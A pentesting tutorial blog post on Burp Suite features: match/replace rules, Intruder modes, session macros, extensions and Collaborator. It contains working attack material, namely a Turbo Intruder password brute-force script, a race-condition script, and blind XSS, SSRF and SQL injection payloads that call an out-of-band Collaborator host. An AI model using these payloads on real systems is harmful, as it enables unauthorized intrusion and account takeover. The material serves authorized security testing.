
Burp Suite Tips & Tricks

Apr 20, 2024
5 min read
lawbyte

Most people use Burp Suite at about 20% of its capability. This post covers the features that actually speed up web pentesting — Match & Replace rules, macros for authenticated scanning, Turbo Intruder for high-speed fuzzing, and the extensions worth installing.

Match & Replace Rules

Proxy → Options → Match and Replace

These apply automatically to every request/response in scope. Set them up once, forget about them.

Always useful rules

| Type | Match | Replace | Use |
|---|---|---|---|
| Request header | `^User-Agent.*` | `Mozilla/5.0 (X11; Linux x86_64)` | Normalize UA |
| Response header | `X-Frame-Options:.*` | (empty, removes the header) | Enable clickjacking test |
| Response header | `Content-Security-Policy:.*` | (empty, removes the header) | Strip CSP for XSS testing |
| Response body | `"is_admin":false` | `"is_admin":true` | Test admin features |
| Request header | `^` | `X-Forwarded-For: 127.0.0.1` | IP spoofing |

Add headers to all requests

Match: ^ (beginning of headers, regex mode)
Replace: X-Custom-Header: value\r\n
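To make the mechanics of those rules concrete, here is an added Python model of how regex match/replace rewrites a raw HTTP message. It is my own illustration, not Burp's implementation: the sample request and response are constructed, the `RULES` list restates the table above (with the User-Agent replacement keeping the header name, since the match consumes the whole line), and the assumption that header rules run once over the header block below the request/status line in multiline mode is a simplification, not Burp's documented behaviour.

```python
import re

# Constructed sample messages (not captured from any real host).
SAMPLE_REQUEST = (
    "GET /api/me HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "User-Agent: curl/8.5.0\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "X-Frame-Options: DENY\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "\r\n"
    '{"user":"alice","is_admin":false}'
)

# (section, match regex, replacement): the rules from the table above.
# The User-Agent replacement keeps the header name because the match
# consumes the whole line; the "^" rule carries its own trailing CRLF.
RULES = [
    ("request_header",  r"^User-Agent.*",               "User-Agent: Mozilla/5.0 (X11; Linux x86_64)"),
    ("request_header",  r"^",                           "X-Forwarded-For: 127.0.0.1\r\n"),
    ("response_header", r"^X-Frame-Options:.*",         ""),
    ("response_header", r"^Content-Security-Policy:.*", ""),
    ("response_body",   r'"is_admin":false',            '"is_admin":true'),
]


def _split(message):
    """Request/status line, list of header lines, body."""
    head, _, body = message.partition("\r\n\r\n")
    first_line, *header_lines = head.split("\r\n")
    return first_line, header_lines, body


def _apply_header_rule(header_lines, pattern, replacement):
    # Simplified model (an assumption, not Burp's documented internals): the
    # rule runs once over the header block below the request/status line in
    # multiline regex mode, so "^" anchors at a line start; a header whose
    # line is replaced by nothing is dropped rather than left blank.
    block = "\n".join(header_lines)
    block = re.sub(pattern, replacement.replace("\r\n", "\n"), block,
                   count=1, flags=re.MULTILINE)
    return [line for line in block.split("\n") if line]


def apply_rules(message, rules, is_response):
    """Apply every applicable rule in order and return the rewritten message."""
    first_line, header_lines, body = _split(message)
    side = "response" if is_response else "request"
    for section, pattern, replacement in rules:
        rule_side, _, part = section.partition("_")
        if rule_side != side:
            continue
        if part == "header":
            header_lines = _apply_header_rule(header_lines, pattern, replacement)
        else:
            body = re.sub(pattern, replacement, body)
    return "\r\n".join([first_line, *header_lines]) + "\r\n\r\n" + body


if __name__ == "__main__":
    print(apply_rules(SAMPLE_REQUEST, RULES, is_response=False))
    print(apply_rules(SAMPLE_RESPONSE, RULES, is_response=True))
```

Running it shows the two response headers gone, the body flag flipped, and the request carrying the normalized User-Agent plus the injected X-Forwarded-For. The same model is a quick way to sanity-check a new rule's regex before trusting it across a whole scan.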


Scope Configuration

Set scope early — it prevents Burp from logging noise and Scanner/Extensions only target in-scope items.

Target → Scope → Add:
Protocol: https
Host: *.target.com
File: .*

# Or import from OpenAPI spec
Target → Import → OpenAPI

Show only in-scope items in Proxy:

Proxy → Options → Intercept Client Requests → check “And URL is in target scope”


Repeater Shortcuts

| Shortcut | Action |
|---|---|
| Ctrl+R | Send request to Repeater |
| Ctrl+Shift+R | Switch to Repeater |
| Ctrl+Space | Send request |
| Ctrl+Z | Undo |
| Ctrl+↑/↓ | Navigate through request history |
| Ctrl+G | Go to line |
| Ctrl+F | Find in request/response |

Right-click → Change request method — instantly convert GET to POST and vice versa with parameter migration.


Intruder Modes

Sniper — one payload list, injected into each position in turn. Good for fuzzing individual parameters.

Battering Ram — same payload list, injected into all positions simultaneously. Good for login brute-force where username=password.

Pitchfork — multiple lists, each matched to a position by index. Good for credential stuffing (username list + corresponding password list).

Cluster Bomb — multiple lists, all combinations. Good for brute-forcing when you don’t know which username/password pairs go together.
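The four attack types differ only in how they combine payload sets with positions, and the difference is easiest to see in code. This is an added Python illustration of my own (not Burp's code) that expands a template with `§marker§` positions the way each attack type does; the template, payload sets and the `intruder_requests` / `request_counts` names are constructed for the example. It is also a quick way to estimate how many requests an attack will send before you launch it, which matters for rate limits and for the volume of log noise the target will see.

```python
import re
from itertools import product

# A §marker§ pair surrounds each payload position, as in the Intruder positions tab.
MARK = re.compile("§([^§]*)§")


def _fill(template, values):
    """Substitute one value per marker, left to right."""
    it = iter(values)
    return MARK.sub(lambda m: next(it), template)


def intruder_requests(mode, template, payload_sets):
    """Return the concrete requests each attack type would generate."""
    base = MARK.findall(template)          # original value at each position
    n = len(base)
    if mode == "sniper":
        # one payload set; one position varied at a time, the others kept as-is
        combos = [base[:i] + [p] + base[i + 1:]
                  for i in range(n) for p in payload_sets[0]]
    elif mode == "battering ram":
        # one payload set; the same payload goes into every position at once
        combos = [[p] * n for p in payload_sets[0]]
    elif mode == "pitchfork":
        # one set per position, walked in parallel (stops at the shortest set)
        combos = [list(t) for t in zip(*payload_sets[:n])]
    elif mode == "cluster bomb":
        # one set per position, every combination
        combos = [list(t) for t in product(*payload_sets[:n])]
    else:
        raise ValueError("unknown attack type: %s" % mode)
    return [_fill(template, c) for c in combos]


# Constructed template and payload sets (not from any real target).
TEMPLATE = "user=§alice§&pass=§secret§"
SETS = [["u1", "u2"], ["p1", "p2", "p3"]]


def request_counts():
    """How many requests each attack type sends for TEMPLATE and SETS."""
    return {m: len(intruder_requests(m, TEMPLATE, SETS))
            for m in ("sniper", "battering ram", "pitchfork", "cluster bomb")}


if __name__ == "__main__":
    for mode, count in request_counts().items():
        print("%-14s %d requests" % (mode, count))
        for r in intruder_requests(mode, TEMPLATE, SETS):
            print("   ", r)
```

With two positions and sets of size 2 and 3, sniper sends 4 requests, battering ram 2, pitchfork 2 (the third password is never used) and cluster bomb 6; the cluster-bomb count is the product of all set sizes, which is why it explodes quickly.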


Turbo Intruder

Much faster than Intruder for high-request attacks. Uses HTTP/2 and pipelining.

Extensions → BApp Store → Turbo Intruder

```python
# Basic password brute force.
# Turbo Intruder substitutes each queued payload for the %s marker you place
# in the request template (target.req); it runs inside Burp, so RequestEngine
# and table are provided by the extension, not imported here.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False)

    for password in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, password.rstrip())


def handleResponse(req, interesting):
    # Keep only responses that look like a successful login
    if req.status == 302 or 'Welcome' in req.response:
        table.add(req)
```

```python
# Race condition: send N requests at exactly the same time.
# Queued requests are held behind a named gate and released together.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=100,
                           pipeline=True)

    for i in range(20):
        engine.queue(target.req, gate='race1')

    engine.openGate('race1')  # fire all at once


def handleResponse(req, interesting):
    # Show every response so differing outcomes are visible side by side
    table.add(req)
```

Session Handling Macros

For testing authenticated endpoints, set up a macro to automatically re-authenticate when the session expires.

Project Options → Sessions → Session Handling Rules → Add

  1. Rule action: Run a macro
  2. Macro: Record a login sequence
    • Proxy → History → select login requests
    • Right-click → “Add to macro”
  3. Scope: Apply to Intruder, Scanner, Repeater

Example macro: GET /login-page → extract CSRF token → POST /login with creds + token → extract new session cookie → inject into subsequent requests.


CSRF Token Extraction in Macros

When the app has CSRF tokens:

  1. Project Options → Sessions → Macros → Add
  2. Record: GET /page-with-form (captures CSRF token)
  3. Click “Configure item” on the GET request
  4. Custom parameter locations: extract csrf_token from response body
  5. In the POST request, reference ¶csrf_token¶
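The two procedures above (the login macro and the CSRF token extraction it depends on) boil down to one loop: fetch the form, pull the token out of the body, post credentials plus token, capture the new session cookie, and re-run the whole thing when a request comes back unauthenticated. Here is an added Python sketch of that loop that I wrote for this post; it is not Burp's macro engine. To keep it runnable offline it talks to a constructed in-memory `FakeApp` instead of a real site, and the paths (`/login-page`, `/login`), the `csrf_token` field and the `tester` / `example-password` credentials are all made up for the example.

```python
import re
import secrets


class FakeApp:
    """Constructed stand-in for the target: issues a CSRF token on the login
    page, checks it on POST /login, and expires a session after `session_ttl`
    authenticated requests so the re-authentication path gets exercised."""

    def __init__(self, session_ttl=3):
        self.csrf_tokens = set()
        self.sessions = {}        # cookie value -> requests remaining
        self.session_ttl = session_ttl
        self.logins = 0           # how many times the macro had to run

    def handle(self, method, path, headers=None, body=None):
        headers = headers or {}
        body = body or {}
        if method == "GET" and path == "/login-page":
            token = secrets.token_hex(8)
            self.csrf_tokens.add(token)
            return 200, {}, '<input type="hidden" name="csrf_token" value="%s">' % token
        if method == "POST" and path == "/login":
            ok = (body.get("csrf_token") in self.csrf_tokens
                  and body.get("username") == "tester"
                  and body.get("password") == "example-password")
            if not ok:
                return 403, {}, "bad credentials or token"
            self.csrf_tokens.discard(body["csrf_token"])   # single-use token
            cookie = secrets.token_hex(8)
            self.sessions[cookie] = self.session_ttl
            self.logins += 1
            return 302, {"Set-Cookie": "session=%s; HttpOnly" % cookie}, ""
        # every other path requires a live session cookie
        m = re.search(r"session=([0-9a-f]+)", headers.get("Cookie", ""))
        cookie = m.group(1) if m else None
        if cookie not in self.sessions or self.sessions[cookie] <= 0:
            return 401, {}, "session expired"
        self.sessions[cookie] -= 1
        return 200, {}, "data for %s" % path


# Step 4 of the CSRF procedure: where in the response body the token lives.
CSRF_RE = re.compile(r'name="csrf_token" value="([^"]+)"')
COOKIE_RE = re.compile(r"session=([^;]+)")


class SessionHandler:
    """The session-handling rule: run the login macro when needed and inject
    the captured cookie into every subsequent request."""

    def __init__(self, app, username, password):
        self.app, self.username, self.password = app, username, password
        self.cookie = None

    def run_login_macro(self):
        _, _, page = self.app.handle("GET", "/login-page")
        token = CSRF_RE.search(page).group(1)          # extract csrf_token
        status, headers, _ = self.app.handle("POST", "/login", body={
            "username": self.username, "password": self.password,
            "csrf_token": token})                      # the ¶csrf_token¶ reference
        if status != 302:
            raise RuntimeError("login macro failed with status %d" % status)
        self.cookie = COOKIE_RE.search(headers["Set-Cookie"]).group(1)

    def request(self, method, path):
        if self.cookie is None:
            self.run_login_macro()
        hdrs = {"Cookie": "session=" + self.cookie}
        status, _, body = self.app.handle(method, path, headers=hdrs)
        if status == 401:                              # session died: re-auth once, retry
            self.run_login_macro()
            hdrs = {"Cookie": "session=" + self.cookie}
            status, _, body = self.app.handle(method, path, headers=hdrs)
        return status, body


def demo():
    """Seven authenticated requests against a session that lasts three."""
    app = FakeApp(session_ttl=3)
    client = SessionHandler(app, "tester", "example-password")
    statuses = [client.request("GET", "/api/item/%d" % i)[0] for i in range(7)]
    return statuses, app.logins


if __name__ == "__main__":
    print(demo())
```

All seven requests succeed and the macro runs three times (the initial login plus two transparent re-authentications), which is exactly what you want Scanner or Intruder to see: no 401s leaking into results because the session quietly expired mid-run.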

Useful Extensions (BApp Store)

| Extension | Use |
|---|---|
| Autorize | Automatically tests for BOLA/IDOR: replays all requests with a lower-privilege token |
| JWT Editor | JWT decode, modify, sign with custom keys, attack flows |
| InQL | GraphQL introspection, query editor, IDOR testing |
| Param Miner | Discovers hidden parameters via wordlist and header guessing |
| HTTP Request Smuggler | Detects and exploits HTTP request smuggling |
| Turbo Intruder | High-speed fuzzing with Python |
| Active Scan++ | Extends Scanner with additional checks |
| Retire.js | Identifies vulnerable JavaScript libraries |
| Logger++ | Advanced logging with filters and search |
| Hackvertor | In-editor encoding/decoding and transformations |
| SQLiPy | SQLMap integration: send from Repeater |
| Wsdler | WSDL parser for SOAP web service testing |

Autorize — BOLA Testing

One of the most valuable extensions for API testing.

  1. Log in as User A (higher privilege), note all endpoints.
  2. Log in as User B (lower privilege), copy session cookie.
  3. Open Autorize → paste User B’s cookie.
  4. Browse as User A — Autorize automatically replays every request as User B.
  5. Green = User B can’t access. Red = BOLA confirmed.
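The comparison Autorize does in step 4 and 5 is simple enough to write out, and doing so makes the verdicts easier to read. This is an added Python example of mine, not Autorize's code: `fake_api` is a constructed two-user API in which `/api/notes/<id>` checks ownership and `/api/export/<id>` forgets to, and `classify` replays each of User A's requests with User B's token and applies the green/red rule from the steps above (plus a third "unclear" verdict for responses that differ without a clean denial, a simplification of my own rather than Autorize's exact heuristic).

```python
import re

# Constructed target: two records, each owned by one user, and two tokens.
RECORDS = {
    1: {"owner": "userA", "note": "A's private note"},
    2: {"owner": "userB", "note": "B's private note"},
}
TOKENS = {"token-A": "userA", "token-B": "userB"}


def fake_api(path, token):
    """Stand-in for the real API. /api/notes/<id> enforces ownership;
    /api/export/<id> forgets to, which is the BOLA we want flagged."""
    user = TOKENS.get(token)
    if user is None:
        return 401, ""
    m = re.fullmatch(r"/api/(notes|export)/(\d+)", path)
    if not m:
        return 404, ""
    kind, rec = m.group(1), RECORDS.get(int(m.group(2)))
    if rec is None:
        return 404, ""
    if kind == "notes" and rec["owner"] != user:
        return 403, ""
    return 200, rec["note"]


def classify(path, high_token, low_token):
    """Autorize-style verdict for one request: send it as the high-privilege
    user, replay it with the low-privilege token, compare the two answers."""
    a_status, a_body = fake_api(path, high_token)
    b_status, b_body = fake_api(path, low_token)
    if a_status != 200:
        return "skipped"            # A could not access it either; nothing to compare
    if b_status in (401, 403):
        return "enforced"           # green: B was refused
    if b_status == a_status and b_body == a_body:
        return "bypassed"           # red: B received A's response, BOLA confirmed
    return "unclear"                # same status, different body; needs a manual look


def run_replay(paths, high_token="token-A", low_token="token-B"):
    """Verdict per path, the way the Autorize table lists them."""
    return {p: classify(p, high_token, low_token) for p in paths}


if __name__ == "__main__":
    for path, verdict in run_replay(["/api/notes/1", "/api/export/1", "/api/notes/2"]).items():
        print("%-9s %s" % (verdict, path))
```

The export endpoint comes back "bypassed" while the notes endpoint is "enforced", and the request A was never allowed to make is skipped rather than reported, which is the same reason Autorize only draws conclusions from requests the higher-privilege user could actually complete.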

Scanner Configuration

Dashboard → New Scan → Audit

For faster scans, customize the audit configuration:

  • Audit optimization: Balance between accuracy and speed
  • Handling application errors: Check “Ignore application errors after N consecutive errors”
  • Issues to detect: Uncheck low-value checks (banner grabbing, etc.)
  • Insertion points: Specify which parameter types to fuzz

Crawl + Audit configuration:

  • Login macros for authenticated crawl
  • Max crawl depth to avoid infinite loops
  • Custom error page detection

HTTP History Filtering

Proxy → HTTP History:

Filter by:
- Show only in-scope items
- Filter by MIME type (e.g., only JSON)
- Search by request/response content
- Filter by response code (e.g., 2xx, 4xx)

# Quick column sort:
Click "Method" column → shows all POSTs together
Click "Status" column → groups by response code

Useful Keyboard Shortcuts

| Shortcut | Action |
|---|---|
| Ctrl+Shift+D | Send to Decoder |
| Ctrl+Shift+C | Send to Comparer |
| Ctrl+Shift+I | Send to Intruder |
| Ctrl+R | Send to Repeater |
| Ctrl+A | Select all text in editor |
| Ctrl+U | URL encode selection |
| Ctrl+Shift+U | URL decode selection |
| Ctrl+H | HTML encode/decode |
| Ctrl+B | Base64 encode |
| Ctrl+Shift+B | Base64 decode |

Collaborator Tricks

Burp Collaborator provides out-of-band HTTP/DNS/SMTP callbacks.

# Use in payloads wherever you need OOB interaction:
https://YOUR_COLLAB_ID.burpcollaborator.net

# SSRF detection
?url=https://YOUR_COLLAB_ID.burpcollaborator.net

# Blind XSS
<script src="//YOUR_COLLAB_ID.burpcollaborator.net/xss.js"></script>

# Blind SQLi
'; EXEC xp_dirtree '\\YOUR_COLLAB_ID.burpcollaborator.net\x'--

# Check Collaborator tab for incoming interactions

Project-Level Config Worth Saving

// Project Options → Misc → Scheduled Tasks
// Auto-save project every 5 minutes

// SSL Pass-Through — for hosts that break Burp interception
// Proxy → Options → SSL Pass Through
// Add: specific host that handles its own pinning

Always export project config after setting up scope, macros, and match/replace rules:

Project → Save project → gives you a .burp file with all settings intact.
